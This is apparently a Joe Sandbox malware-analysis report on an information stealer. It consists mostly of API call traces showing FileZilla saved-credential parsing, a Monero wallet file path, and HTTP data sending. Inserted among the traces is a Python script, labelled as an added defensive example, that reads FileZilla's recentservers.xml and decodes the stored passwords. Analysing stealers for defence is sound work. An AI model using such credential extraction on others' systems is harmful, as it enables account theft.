                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                        • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 00198F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00198F9B
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 0018A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                          • Part of subcall function 0018A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                          • Part of subcall function 0018A110: LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                          • Part of subcall function 0018A110: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                          • Part of subcall function 0018A110: LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                          • Part of subcall function 0018A110: CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                          • Part of subcall function 00198FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00198FE2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,001A0DBF,001A0DBE,001A0DBB,001A0DBA), ref: 001904C2
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001904C9
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 001904E5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 001904F3
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0019052F
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 0019053D
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00190579
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 00190587
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001905C3
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 001905D5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 00190662
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 0019067A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 00190692
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 001906AA
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001906C2
                                        • lstrcat.KERNEL32(?,profile: null), ref: 001906D1
                                        • lstrcat.KERNEL32(?,url: ), ref: 001906E0
                                        • lstrcat.KERNEL32(?,00000000), ref: 001906F3
                                        • lstrcat.KERNEL32(?,001A1770), ref: 00190702
                                        • lstrcat.KERNEL32(?,00000000), ref: 00190715
                                        • lstrcat.KERNEL32(?,001A1774), ref: 00190724
                                        • lstrcat.KERNEL32(?,login: ), ref: 00190733
                                        • lstrcat.KERNEL32(?,00000000), ref: 00190746
                                        • lstrcat.KERNEL32(?,001A1780), ref: 00190755
                                        • lstrcat.KERNEL32(?,password: ), ref: 00190764
                                        • lstrcat.KERNEL32(?,00000000), ref: 00190777
                                        • lstrcat.KERNEL32(?,001A1790), ref: 00190786
                                        • lstrcat.KERNEL32(?,001A1794), ref: 00190795
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0DB7), ref: 001907EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: c093cc12e892e8d95863b230683e19c05f2b78dd10b6cf16f45e97f8756db73c
                                        • Instruction ID: be1cac88576c0ff9c0f4e1f9b53fce910651355a40a6b9b06d70074ddf1098ab
                                        • Opcode Fuzzy Hash: c093cc12e892e8d95863b230683e19c05f2b78dd10b6cf16f45e97f8756db73c
                                        • Instruction Fuzzy Hash: 4FD13076910208ABCF04EBF0DD56EEE7779AF29301F508564F102A7196DF34BA48CBA5
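The function above opens `\AppData\Roaming\FileZilla\recentservers.xml`, searches it with `StrStrA` for the `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">` tags, and concatenates the values into a text record beginning `browser: FileZilla` / `profile: null`. The following Python is an added example written for this page, not code from the report or from the sample: it parses a constructed `recentservers.xml` the same way so an analyst can list the hosts whose credentials must be rotated after an infection, and it recognises records in the layout the trace builds inside recovered data (memory dumps, proxy logs). The field separators between the concatenated values (the string pointers `001A1770`, `001A1774`, `001A1780`, `001A1790`, `001A1794`) are not shown in the report, so the record pattern assumes one field per line and `host:port` in the `url:` field; the sample XML and the exfil fragment are constructed.

```python
"""Added example (not from the Joe Sandbox report or the analysed sample): parse the
FileZilla recentservers.xml that the trace reads, and recognise the text records the
sample builds from it."""
import base64
import re
import xml.etree.ElementTree as ET

# Constructed sample of %APPDATA%\FileZilla\recentservers.xml. FileZilla stores the
# password base64-encoded (the <Pass encoding="base64"> tag the trace searches for).
# Base64 is an encoding, not encryption: anyone who can read the file has the password.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.invalid</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.invalid</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>backup</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def parse_recentservers(xml_text: str) -> list[dict]:
    """Return one dict per <Server> with host, port, user and the decoded password.

    Servers without a <Pass> element (anonymous or key-based logons) are kept with
    password=None so the analyst still sees which hosts were exposed to the stealer.
    """
    root = ET.fromstring(xml_text)
    entries = []
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        password = None
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                password = base64.b64decode(pass_el.text).decode("utf-8", "replace")
            else:
                password = pass_el.text  # very old FileZilla versions stored plaintext
        entries.append({
            "host": (server.findtext("Host") or "").strip(),
            "port": int(server.findtext("Port") or 0),
            "user": (server.findtext("User") or "").strip(),
            "password": password,
        })
    return entries


# The trace concatenates these literals around the extracted values. The separators
# between them are not visible in the report, so this pattern ASSUMES one field per
# line and "host:port" in the url field; adjust it to what your own dump shows.
STEALER_RECORD = re.compile(
    r"browser: FileZilla\r?\n"
    r"profile: null\r?\n"
    r"url: (?P<url>[^\r\n]*)\r?\n"
    r"login: (?P<login>[^\r\n]*)\r?\n"
    r"password: (?P<password>[^\r\n]*)"
)


def find_filezilla_records(blob: bytes) -> list[dict]:
    """Scan recovered data (memory dump, proxy log, exfil body) for FileZilla records
    in the layout the sample builds, so leaked credentials can be matched to hosts."""
    text = blob.decode("utf-8", "replace")
    return [m.groupdict() for m in STEALER_RECORD.finditer(text)]


def hosts_to_rotate(entries: list[dict]) -> set[str]:
    """Every stored password is compromised once the file has been read."""
    return {f"{e['user']}@{e['host']}:{e['port']}" for e in entries if e["password"]}


if __name__ == "__main__":
    creds = parse_recentservers(SAMPLE_RECENTSERVERS)
    for entry in creds:
        print(entry)
    print("rotate:", sorted(hosts_to_rotate(creds)))
    # Constructed exfil fragment in the assumed record layout.
    fragment = (b"browser: FileZilla\nprofile: null\nurl: ftp.example.invalid:21\n"
                b"login: deploy\npassword: hunter2\n")
    print(find_filezilla_records(fragment))
```

Run it against a real `recentservers.xml` copied from a compromised profile (and `sitemanager.xml`, which uses the same tags) to get the rotation list; the record matcher is a triage aid for recovered data and must be re-tuned once the real separators are known.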
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                          • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00185A48
                                        • StrCmpCA.SHLWAPI(?,011CE938), ref: 00185A63
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00185BE3
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,011CE768,00000000,?,011CA630,00000000,?,001A1B4C), ref: 00185EC1
                                        • lstrlen.KERNEL32(00000000), ref: 00185ED2
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00185EE3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00185EEA
                                        • lstrlen.KERNEL32(00000000), ref: 00185EFF
                                        • lstrlen.KERNEL32(00000000), ref: 00185F28
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00185F41
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00185F6B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00185F7F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00185F9C
                                        • InternetCloseHandle.WININET(00000000), ref: 00186000
                                        • InternetCloseHandle.WININET(00000000), ref: 0018600D
                                        • HttpOpenRequestA.WININET(00000000,011CE838,?,011CE398,00000000,00000000,00400100,00000000), ref: 00185C48
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00186017
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 855f424bbaff0f716d8a3a9fbe0b2cc49ee28d19aa889e8b973b9079e53229fb
                                        • Instruction ID: d588238701291c5cfbb03295891a465dc4de9cf67a9806b2f3f6a632b0d4127b
                                        • Opcode Fuzzy Hash: 855f424bbaff0f716d8a3a9fbe0b2cc49ee28d19aa889e8b973b9079e53229fb
                                        • Instruction Fuzzy Hash: 0B129D71920118ABCF15EBA0DCA5FEEB379BF24700F5045A9F10666192EF706B48CFA5
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018D083
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018D1C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0018D1CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D308
                                        • lstrcat.KERNEL32(?,001A1570), ref: 0018D317
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D32A
                                        • lstrcat.KERNEL32(?,001A1574), ref: 0018D339
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D34C
                                        • lstrcat.KERNEL32(?,001A1578), ref: 0018D35B
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D36E
                                        • lstrcat.KERNEL32(?,001A157C), ref: 0018D37D
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D390
                                        • lstrcat.KERNEL32(?,001A1580), ref: 0018D39F
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D3B2
                                        • lstrcat.KERNEL32(?,001A1584), ref: 0018D3C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018D3D4
                                        • lstrcat.KERNEL32(?,001A1588), ref: 0018D3E3
                                          • Part of subcall function 0019AB30: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DDF), ref: 0019AB3B
                                          • Part of subcall function 0019AB30: lstrcpy.KERNEL32(001A0DDF,00000000), ref: 0019AB95
                                        • lstrlen.KERNEL32(?), ref: 0018D42A
                                        • lstrlen.KERNEL32(?), ref: 0018D439
                                          • Part of subcall function 0019AD80: StrCmpCA.SHLWAPI(00000000,001A1568,0018D2A2,001A1568,00000000), ref: 0019AD9F
                                        • DeleteFileA.KERNEL32(00000000), ref: 0018D4B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: 7344fbee80c7a4457c797de7c8b026a5f82e1baa5930868827588d97517a636a
                                        • Instruction ID: 3bed5fa1d26e117da5d83a4d6edabd0b15520b68913412824fd1430544029bad
                                        • Opcode Fuzzy Hash: 7344fbee80c7a4457c797de7c8b026a5f82e1baa5930868827588d97517a636a
                                        • Instruction Fuzzy Hash: DAE1E171914208ABCF04EBA0ED96EEE7379AF64301F5045A4F107771A2DF31BA48CBA5
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,011CD038,00000000,?,001A1544,00000000,?,?), ref: 0018CB6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0018CB89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0018CB95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0018CBA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0018CBD9
                                        • StrStrA.SHLWAPI(?,011CCF90,001A0B56), ref: 0018CBF7
                                        • StrStrA.SHLWAPI(00000000,011CCFA8), ref: 0018CC1E
                                        • StrStrA.SHLWAPI(?,011CD940,00000000,?,001A1550,00000000,?,00000000,00000000,?,011C90D8,00000000,?,001A154C,00000000,?), ref: 0018CDA2
                                        • StrStrA.SHLWAPI(00000000,011CD7C0), ref: 0018CDB9
                                          • Part of subcall function 0018C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0018C971
                                          • Part of subcall function 0018C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0018C97C
                                        • StrStrA.SHLWAPI(?,011CD7C0,00000000,?,001A1554,00000000,?,00000000,011C9058), ref: 0018CE5A
                                        • StrStrA.SHLWAPI(00000000,011C92A8), ref: 0018CE71
                                          • Part of subcall function 0018C920: lstrcat.KERNEL32(?,001A0B47), ref: 0018CA43
                                          • Part of subcall function 0018C920: lstrcat.KERNEL32(?,001A0B4B), ref: 0018CA57
                                          • Part of subcall function 0018C920: lstrcat.KERNEL32(?,001A0B4E), ref: 0018CA78
                                        • lstrlen.KERNEL32(00000000), ref: 0018CF44
                                        • CloseHandle.KERNEL32(00000000), ref: 0018CF9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 77eead63a5973111221ccd9ae1b2f4cf6ce8af7adcf8279cbee39c45a55c41fb
                                        • Instruction ID: 8777f999a37f64a105e05213dbe0cc0067b171216a71504f8d368253841fcbcb
                                        • Opcode Fuzzy Hash: 77eead63a5973111221ccd9ae1b2f4cf6ce8af7adcf8279cbee39c45a55c41fb
                                        • Instruction Fuzzy Hash: 23E1BB71910108ABCF15EBA4DCA2FEEB779BF64300F4045A9F10767192EF306A49CBA5
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • RegOpenKeyExA.ADVAPI32(00000000,011CB4C8,00000000,00020019,00000000,001A05BE), ref: 00198534
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001985B6
                                        • wsprintfA.USER32 ref: 001985E9
